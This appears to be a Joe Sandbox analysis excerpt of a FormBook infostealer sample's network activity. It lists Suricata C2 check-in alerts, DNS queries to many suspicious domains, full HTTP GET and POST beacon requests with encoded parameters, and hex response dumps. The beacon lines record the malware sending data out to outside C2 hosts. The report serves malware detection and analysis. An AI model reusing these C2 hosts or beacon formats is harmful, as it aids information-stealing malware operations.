            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50012 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50002 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50023 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49996 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50029 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49997 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50022 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50032 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50032 -> 85.159.66.93:80
            Source: Joe Sandbox ViewIP Address: 172.191.244.62 172.191.244.62
            Source: Joe Sandbox ViewIP Address: 63.250.47.40 63.250.47.40
            Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
            Source: Joe Sandbox ViewASN Name: ATT-INTERNET4US ATT-INTERNET4US
            Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: Joe Sandbox ViewASN Name: HOSTNETNL HOSTNETNL
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 08 Oct 2024 13:55:40 GMTserver: Apacheset-cookie: __tad=1728395740.6411101; expires=Fri, 06-Oct-2034 13:55:40 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 581content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 c8 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba c3 aa 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 8d 5d 49 47 db ab 6c 87 2b af 09 73 71 8c 47 b9 57 4e f7 04 b4 ef b1 88 09 ef 49 dc ca ad 3c 46 63 f0 4e 15 b1 b8 f5 a2 d6 66 8d ae 77 da 90 d0 ba c6 ac d3 26 bb f5 71 99 8b 23 f6 7f a9 ca 68 2b 1d 38 ac b4 43 45 bf 5b 6d ee a0 80 a4 21 ea 17 42 ec 76 bb ec b5 46 d1 f7 ef e7 e2 53 b2 8c 22 21 e0 06 09 24 90 ee d0 6e 08 6c 0d f3 d9 0c 3a ad 9c f5 a8 ac a9 3c 90 05 bc 47 b5 21 64 e0 53 21 d0 35 50 83 f0 42 3f f4 ce 76 da 73 4c ea d6 43 6d 1d 78 db 21 53 a4 b7 26 aa 37 46 91 b6 86 8f db 76 25 d5 dd f5 98 2a 9d c2 43 34 d9 69 53 d9 5d d6 5a 25 03 2a 73 d8 b7 52 61 fa 97 b3 f3 a4 ee 8b 8b 8f c9 74 19 1d a2 88 dc 3e 30 59 a5 27 70 95 fb 39 9a 28 c0 23 8d 9b f4 75 b5 77 c1 20 f3 27 a1 6d 75 ff 63 d4 5c c0 97 67 27 df 6e 58 87 ac d2 87 ce 1a 4d 96 43 eb 45 90 ed f1 10 98 27 56 34 99 64 dc 04 93 d6 3d 14 25 67 cb d6 c8 76 a6 a7 38 bf 4c 1c fa 4d 4b e1 fc 01 c2 7e 2c ec 82 ce 60 27 39 3f 22 b2 ad f6 a1 d8 d7 6a 39 c0 54 8b f2 c9 52 fa ec 6e 7a 3c 7d 5b bb 42 99 81 10 74 1f 80 b1 aa 49 d1 b9 a1 e3 ff 7e 87 a1 ab 2f 07 8f f6 3c cb b0 b2 15 37 1a 02 76 ed ec c6 54 8b b3 cb d9 a5 9a 5f c1 01 18 3d 80 98 36 5e 8c 01 bd 5a 2b db 5a 57 c4 67 f5 b0 62 08 73 cb db d9 b0 78 6a f3 4a 6f 61 e0 16 49 a5 3d ab df 2f c0 58 83 cb a4 cc 25 34 0e eb e2 0d 53 1c e6 61 9e 94 9f 5b ad ee a0 41 87 c3 b8 1a 42 97 0b c9 97 88 ab 70 2d 63 47 4f 79 87 c4 c9 39 ed 05 fe d9 e8 6d 11 73 1d ee 7f 13 03 8f 11 31 b1 88 67 4b f8 75 fd bd 78 5b ed 0f e1 a6 9e d2 73 17 82 fd a1 1b e1 6f f1 08 0f 59 bd ae 34 04 00 00 Data Ascii: Tn0=_A;jnAX-y4(7-==rPQAZ,]IGl+sqGWNI<FcNfw&q#h+8CE[m!BvFS"!$nl:<G!dS!5PB?vsLCmx!S&7Fv%*C4iS]Z%*sRat>0Y'p9(#uw 'muc\g'nXMCE'V4d=%gv8LMK~,`'9?"j9TRnz<}[BtI~/<7vT_=6^Z+ZWgbsxjJoaI=/X%4Sa[ABp-cGOy9ms1gKux[soY4
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 08 Oct 2024 13:55:44 GMTserver: Apacheset-cookie: __tad=1728395744.6678593; expires=Fri, 06-Oct-2034 13:55:44 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 581content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 c8 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba c3 aa 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 8d 5d 49 47 db ab 6c 87 2b af 09 73 71 8c 47 b9 57 4e f7 04 b4 ef b1 88 09 ef 49 dc ca ad 3c 46 63 f0 4e 15 b1 b8 f5 a2 d6 66 8d ae 77 da 90 d0 ba c6 ac d3 26 bb f5 71 99 8b 23 f6 7f a9 ca 68 2b 1d 38 ac b4 43 45 bf 5b 6d ee a0 80 a4 21 ea 17 42 ec 76 bb ec b5 46 d1 f7 ef e7 e2 53 b2 8c 22 21 e0 06 09 24 90 ee d0 6e 08 6c 0d f3 d9 0c 3a ad 9c f5 a8 ac a9 3c 90 05 bc 47 b5 21 64 e0 53 21 d0 35 50 83 f0 42 3f f4 ce 76 da 73 4c ea d6 43 6d 1d 78 db 21 53 a4 b7 26 aa 37 46 91 b6 86 8f db 76 25 d5 dd f5 98 2a 9d c2 43 34 d9 69 53 d9 5d d6 5a 25 03 2a 73 d8 b7 52 61 fa 97 b3 f3 a4 ee 8b 8b 8f c9 74 19 1d a2 88 dc 3e 30 59 a5 27 70 95 fb 39 9a 28 c0 23 8d 9b f4 75 b5 77 c1 20 f3 27 a1 6d 75 ff 63 d4 5c c0 97 67 27 df 6e 58 87 ac d2 87 ce 1a 4d 96 43 eb 45 90 ed f1 10 98 27 56 34 99 64 dc 04 93 d6 3d 14 25 67 cb d6 c8 76 a6 a7 38 bf 4c 1c fa 4d 4b e1 fc 01 c2 7e 2c ec 82 ce 60 27 39 3f 22 b2 ad f6 a1 d8 d7 6a 39 c0 54 8b f2 c9 52 fa ec 6e 7a 3c 7d 5b bb 42 99 81 10 74 1f 80 b1 aa 49 d1 b9 a1 e3 ff 7e 87 a1 ab 2f 07 8f f6 3c cb b0 b2 15 37 1a 02 76 ed ec c6 54 8b b3 cb d9 a5 9a 5f c1 01 18 3d 80 98 36 5e 8c 01 bd 5a 2b db 5a 57 c4 67 f5 b0 62 08 73 cb db d9 b0 78 6a f3 4a 6f 61 e0 16 49 a5 3d ab df 2f c0 58 83 cb a4 cc 25 34 0e eb e2 0d 53 1c e6 61 9e 94 9f 5b ad ee a0 41 87 c3 b8 1a 42 97 0b c9 97 88 ab 70 2d 63 47 4f 79 87 c4 c9 39 ed 05 fe d9 e8 6d 11 73 1d ee 7f 13 03 8f 11 31 b1 88 67 4b f8 75 fd bd 78 5b ed 0f e1 a6 9e d2 73 17 82 fd a1 1b e1 6f f1 08 0f 59 bd ae 34 04 00 00 Data Ascii: Tn0=_A;jnAX-y4(7-==rPQAZ,]IGl+sqGWNI<FcNfw&q#h+8CE[m!BvFS"!$nl:<G!dS!5PB?vsLCmx!S&7Fv%*C4iS]Z%*sRat>0Y'p9(#uw 'muc\g'nXMCE'V4d=%gv8LMK~,`'9?"j9TRnz<}[BtI~/<7vT_=6^Z+ZWgbsxjJoaI=/X%4Sa[ABp-cGOy9ms1gKux[soY4
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 08 Oct 2024 13:55:46 GMTserver: Apacheset-cookie: __tad=1728395746.2134099; expires=Fri, 06-Oct-2034 13:55:46 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 581content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 c8 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba c3 aa 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 8d 5d 49 47 db ab 6c 87 2b af 09 73 71 8c 47 b9 57 4e f7 04 b4 ef b1 88 09 ef 49 dc ca ad 3c 46 63 f0 4e 15 b1 b8 f5 a2 d6 66 8d ae 77 da 90 d0 ba c6 ac d3 26 bb f5 71 99 8b 23 f6 7f a9 ca 68 2b 1d 38 ac b4 43 45 bf 5b 6d ee a0 80 a4 21 ea 17 42 ec 76 bb ec b5 46 d1 f7 ef e7 e2 53 b2 8c 22 21 e0 06 09 24 90 ee d0 6e 08 6c 0d f3 d9 0c 3a ad 9c f5 a8 ac a9 3c 90 05 bc 47 b5 21 64 e0 53 21 d0 35 50 83 f0 42 3f f4 ce 76 da 73 4c ea d6 43 6d 1d 78 db 21 53 a4 b7 26 aa 37 46 91 b6 86 8f db 76 25 d5 dd f5 98 2a 9d c2 43 34 d9 69 53 d9 5d d6 5a 25 03 2a 73 d8 b7 52 61 fa 97 b3 f3 a4 ee 8b 8b 8f c9 74 19 1d a2 88 dc 3e 30 59 a5 27 70 95 fb 39 9a 28 c0 23 8d 9b f4 75 b5 77 c1 20 f3 27 a1 6d 75 ff 63 d4 5c c0 97 67 27 df 6e 58 87 ac d2 87 ce 1a 4d 96 43 eb 45 90 ed f1 10 98 27 56 34 99 64 dc 04 93 d6 3d 14 25 67 cb d6 c8 76 a6 a7 38 bf 4c 1c fa 4d 4b e1 fc 01 c2 7e 2c ec 82 ce 60 27 39 3f 22 b2 ad f6 a1 d8 d7 6a 39 c0 54 8b f2 c9 52 fa ec 6e 7a 3c 7d 5b bb 42 99 81 10 74 1f 80 b1 aa 49 d1 b9 a1 e3 ff 7e 87 a1 ab 2f 07 8f f6 3c cb b0 b2 15 37 1a 02 76 ed ec c6 54 8b b3 cb d9 a5 9a 5f c1 01 18 3d 80 98 36 5e 8c 01 bd 5a 2b db 5a 57 c4 67 f5 b0 62 08 73 cb db d9 b0 78 6a f3 4a 6f 61 e0 16 49 a5 3d ab df 2f c0 58 83 cb a4 cc 25 34 0e eb e2 0d 53 1c e6 61 9e 94 9f 5b ad ee a0 41 87 c3 b8 1a 42 97 0b c9 97 88 ab 70 2d 63 47 4f 79 87 c4 c9 39 ed 05 fe d9 e8 6d 11 73 1d ee 7f 13 03 8f 11 31 b1 88 67 4b f8 75 fd bd 78 5b ed 0f e1 a6 9e d2 73 17 82 fd a1 1b e1 6f f1 08 0f 59 bd ae 34 04 00 00 Data Ascii: Tn0=_A;jnAX-y4(7-==rPQAZ,]IGl+sqGWNI<FcNfw&q#h+8CE[m!BvFS"!$nl:<G!dS!5PB?vsLCmx!S&7Fv%*C4iS]Z%*sRat>0Y'p9(#uw 'muc\g'nXMCE'V4d=%gv8LMK~,`'9?"j9TRnz<}[BtI~/<7vT_=6^Z+ZWgbsxjJoaI=/X%4Sa[ABp-cGOy9ms1gKux[soY4
            Source: global trafficHTTP traffic detected: GET /2jit/?5xn03=7vMx2HlPWl&I4ET5=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1SoEkaj2DIJpzLN/p7keITu3kRidpknmkeFNiZOa1jl486ZzlEj4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.elsupertodo.netConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /7xi5/?I4ET5=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELAz/7PAbspGHYrJhwiAgKAJ54r5fuZ48YeCJJLAh0jfNMUyJhiqw=&5xn03=7vMx2HlPWl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.omexai.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /fpzw/?I4ET5=vk5QQsijTkj0pfFyU7EEWfDzTnpieIWgcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyVx4v2Cu8U6PY7doS41bFIW7T/4/1mYTXkrfUCe/4cLGyNDvWcha0=&5xn03=7vMx2HlPWl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.tekilla.wtfConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /3qit/?I4ET5=t3sSYQcRGIG2xp6lfBDs7+5agoifCQSrmgygjruUB9PzjWbyP4PTndkMOMUzUXzJWS/x79p8zVoA5FmvnGMYQz0a67JVPuK3DRmcV/dEWB275yuHlkBzmr1SLVBbDDm50CRvDPY=&5xn03=7vMx2HlPWl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.bola88site.oneConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /nxfn/?I4ET5=6j3CvtUhPdUgNSN+xHguQlWnRKyrmKs9GdmFQzyR6PqyVz5YOV5r49CB0ghAIxZx6PIHaKVcYUnZkN+R6pfVfWaAaU8Sg/CwIadyJZ1Vunf0ESMtavaN5FCA7KYOqo/KmyEXwiQ=&5xn03=7vMx2HlPWl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.languagemodel.proConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /3bdq/?I4ET5=mPDvA1qI3GiuntP+47r7UbinyaAdWbB61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPasI6LuL9f8nEGr4Exv0kyrqFFpmLMz7jnyzN+XheUDXt53FO2cfXJKOJNKmSe0FPHbZU=&5xn03=7vMx2HlPWl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.kexweb.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /ikh0/?5xn03=7vMx2HlPWl&I4ET5=lvx8xqKuEeZXr5IXmtDcOSOuXgPzygssZETVjxqXK0Zv2i3/Db6zT6O/acvvHmVSaGyiGmLaE43R+XLSCAO1uL6vU7t5jilJUCYKPYTSTWzBlftPtFsf3/wj5zdrQAyp0VL/hTg= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.jobworklanka.onlineConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /h7lb/?I4ET5=RbPHaORuq3VLsIvBIelJ5GO51GGMXVitxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0U8wzgLDyi+d9/jciraahzpwjZL5E+FLfjf2KFU0ZNlPPutFUmc0=&5xn03=7vMx2HlPWl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dyme.techConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /e0nr/?I4ET5=K/5K1kUHGJjjXPwyVklTimZmxQWW0oII6mASorW7taRlmnE0Vh93KWWTZt/v3aaqE5pW7Ym6hodTCoZ1X6txL1JCWIKw0rFG3lN0WjCCPv2jnxqsoqX4CWEeQPgrQsdkl4cxLCA=&5xn03=7vMx2HlPWl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mizuquan.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /pp43/?I4ET5=/yzCblrJsERuqgzzvpbFhEZXPrEdROgu+6Zh8/8YqB01FuO+DLXfgclvHnt3CWNuGllXtp08GnLQKJ2iCtjVv7vDFAlSLEfPMEOpIiPv+zP5mxeS8lh+Zk12JkSAI62mQlNqC9c=&5xn03=7vMx2HlPWl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.nobartv6.websiteConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficDNS traffic detected: DNS query: www.woshop.online
            Source: global trafficDNS traffic detected: DNS query: www.kxshopmr.store
            Source: global trafficDNS traffic detected: DNS query: www.elsupertodo.net
            Source: global trafficDNS traffic detected: DNS query: www.omexai.info
            Source: global trafficDNS traffic detected: DNS query: www.tekilla.wtf
            Source: global trafficDNS traffic detected: DNS query: www.bola88site.one
            Source: global trafficDNS traffic detected: DNS query: www.languagemodel.pro
            Source: global trafficDNS traffic detected: DNS query: www.kexweb.top
            Source: global trafficDNS traffic detected: DNS query: www.jobworklanka.online
            Source: global trafficDNS traffic detected: DNS query: www.dyme.tech
            Source: global trafficDNS traffic detected: DNS query: www.arlon-commerce.com
            Source: global trafficDNS traffic detected: DNS query: www.mizuquan.top
            Source: global trafficDNS traffic detected: DNS query: www.nobartv6.website
            Source: global trafficDNS traffic detected: DNS query: www.sailnway.net
            Source: unknownHTTP traffic detected: POST /7xi5/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Host: www.omexai.infoOrigin: http://www.omexai.infoContent-Type: application/x-www-form-urlencodedContent-Length: 210Connection: closeCache-Control: max-age=0Referer: http://www.omexai.info/7xi5/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)Data Raw: 49 34 45 54 35 3d 76 7a 67 59 35 44 63 68 62 55 54 75 44 6a 34 66 55 36 59 48 75 70 73 47 53 50 58 6d 52 46 49 67 6c 35 4a 41 74 2b 4d 75 37 6a 4c 74 48 52 35 37 37 73 30 70 67 61 79 37 52 48 78 61 61 51 4a 56 73 42 44 31 78 47 70 2b 6d 36 66 2f 53 36 35 79 43 72 38 56 5a 44 76 44 44 6a 48 7a 6a 31 32 43 74 62 6f 53 38 53 77 4e 65 63 42 37 34 37 61 6b 62 4c 6f 74 59 51 52 6f 4b 57 73 4f 69 72 6f 61 47 55 5a 53 6c 65 50 4f 47 57 6a 79 37 79 73 35 65 4e 69 47 54 71 6e 6e 34 39 35 72 6b 77 52 65 35 79 6a 62 61 2f 72 2f 51 76 44 6b 47 77 4d 70 6e 6b 78 36 6f 6c 57 6d 45 72 30 48 41 54 79 45 30 54 6e 36 79 4c 6c 66 34 6d 6e 33 Data Ascii: I4ET5=vzgY5DchbUTuDj4fU6YHupsGSPXmRFIgl5JAt+Mu7jLtHR577s0pgay7RHxaaQJVsBD1xGp+m6f/S65yCr8VZDvDDjHzj12CtboS8SwNecB747akbLotYQRoKWsOiroaGUZSlePOGWjy7ys5eNiGTqnn495rkwRe5yjba/r/QvDkGwMpnkx6olWmEr0HATyE0Tn6yLlf4mn3
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 08 Oct 2024 13:53:51 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 08 Oct 2024 13:53:53 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 08 Oct 2024 13:53:56 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 08 Oct 2024 13:53:58 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 08 Oct 2024 13:54:05 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 